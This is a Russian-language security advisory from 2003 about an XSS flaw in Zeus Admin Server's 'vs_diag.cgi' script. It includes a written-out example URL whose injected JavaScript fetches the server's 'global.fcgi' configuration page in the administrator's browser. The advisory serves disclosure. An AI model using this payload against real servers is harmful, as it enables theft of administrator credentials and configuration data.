Дата публикации: | 02.06.2003 |
Всего просмотров: | 2024 |
Опасность: | |
Наличие исправления: | |
Количество уязвимостей: | 1 |
CVE ID: | Нет данных |
Вектор эксплуатации: | |
Воздействие: | |
CWE ID: | Нет данных |
Наличие эксплоита: | Нет данных |
Уязвимые продукты: | |
Описание: | Уязвимость в проверке правильности ввода обнаружена в Zeus Admin Server в 'vs_diag.cgi' сценарии. Удаленный пользователь может выполнить XSS нападение против администратора сервера.
Сообщается, что сценарий 'vs_diag.cgi' не фильтрует HTML код в данных, представленных пользователем. Удаленный пользователь может сконструировать специально обработанный URL, при загрузке которого администратором, выполнится произвольный код сценария в браузере целевого администратора, в контексте безопасности Zeus Admin сервера. Уязвимость может использоваться для кражи опознавательных данных, хранящихся в куки целевого администратора. Пример: http://<target>:9090/apps/web/vs_diag.cgi?server=<YOUR_CODE> http://<target>:9090/apps/web/vs_diag.cgi?server=<script>function%20pedo() {var%20 xmlHttp%20=%20new%20ActiveXObject("Microsoft.XMLHTTP");xmlHttp.open ("GET","http://<target>:9090/apps/web/global.fcgi",false);xmlHttp.send ();xmlDoc=xmlHttp.responseTex t;document.write(xmlDoc);}pedo();alert("Have% 20you%20enabled%20the%20protection%20of%20your%20ZEUS...?%20We%20can%20rip% 20this%20info!%20Much%20more%20evil%20actions% 20are%20possible...") </script>Уязвимость обнаружена в Zeus Admin Server 4.2r2 |
Ссылки: | Another ZEUS Server web admin XSS! |